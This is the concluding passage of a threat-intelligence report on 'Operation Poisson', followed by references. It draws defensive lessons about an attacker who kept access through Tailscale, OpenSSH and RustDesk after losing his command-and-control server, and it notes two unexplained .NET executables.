C2 takedown is not remediation. The defining lesson from Operation Poisson is documented proof that an attacker can build a parallel access layer that survives losing their primary C2. In this case, the access survived an 18-day outage and was still fully functional when the C2 came back online. Remediation teams must now actively hunt for secondary persistence mechanisms beyond the C2 they identified.

Legitimate tools are the evasion strategy. Poisson used no zero-days, no novel exploit techniques, and no custom implants with sophisticated anti-analysis capabilities (beyond the word-encoding loader). His access survived because Tailscale is signed, legitimate software that most organizations have no detection for. The same is true of OpenSSH Server and RustDesk. Detection that depends on file reputation cannot catch these.

The skill floor is lower than it looks. Poisson failed at roughly half of what he attempted. His OPSEC was poor enough that a public storage bucket exposed his entire playbook. And he still compromised four machines and harvested real credentials. As AI tooling and open-source offensive frameworks continue to lower the barrier to entry, the volume of Poisson-class operators will grow even as the individual skill level stays low.

The Thales question remains open. The execution of two unknown .NET applications under a name associated with a major defense contractor, followed by methodical evidence deletion, is the element of this campaign that deserves continued attention if either Thal.exe or WinFormsApp1.exe resurfaces in future investigations.


References

  1. Simonovich, V. (2026, June 16). Cato CTRL Threat Research: Operation Poisson -- Analyzing a Cybercriminal's Entire Operation. Cato Networks. https://www.catonetworks.com/blog/cato-ctrl-operation-poisson-analyzing-a-cybercriminals-entire-operation/

  2. Khandelwal, S. (2026, June 17). Junior Hacker Used Tailscale and OpenSSH to Keep Access After His C2 Went Offline. The Hacker News. https://thehackernews.com/2026/06/junior-hacker-used-tailscale-and.html

  3. MITRE ATT&CK. (2024). Protocol Tunneling (T1572). https://attack.mitre.org/techniques/T1572/

  4. MITRE ATT&CK. (2024). Remote Access Software (T1219). https://attack.mitre.org/techniques/T1219/

  5. MITRE ATT&CK. (2024). Input Capture: Keylogging (T1056.001). https://attack.mitre.org/techniques/T1056/001/

  6. Tailscale. (2026). How Tailscale Works. https://tailscale.com/blog/how-tailscale-works

  7. The Hacker News. (2025, November). China-Linked APT31 Launches Stealthy Operations. https://thehackernews.com/2025/11/china-linked-apt31-launches-stealthy.html

  8. The Hacker News. (2023, November). US Cybersecurity Agencies Warn of Scattered Spider. https://thehackernews.com/2023/11/us-cybersecurity-agencies-warn-of.html

  9. The Hacker News. (2025, September). SonicWall SSL VPN Flaw and Akira Ransomware. https://thehackernews.com/2025/09/sonicwall-ssl-vpn-flaw-and.html

  10. The Hacker News. (2023, February). Threat Actors Adopt Havoc Framework for Post-Exploitation. https://thehackernews.com/2023/02/threat-actors-adopt-havoc-framework-for.html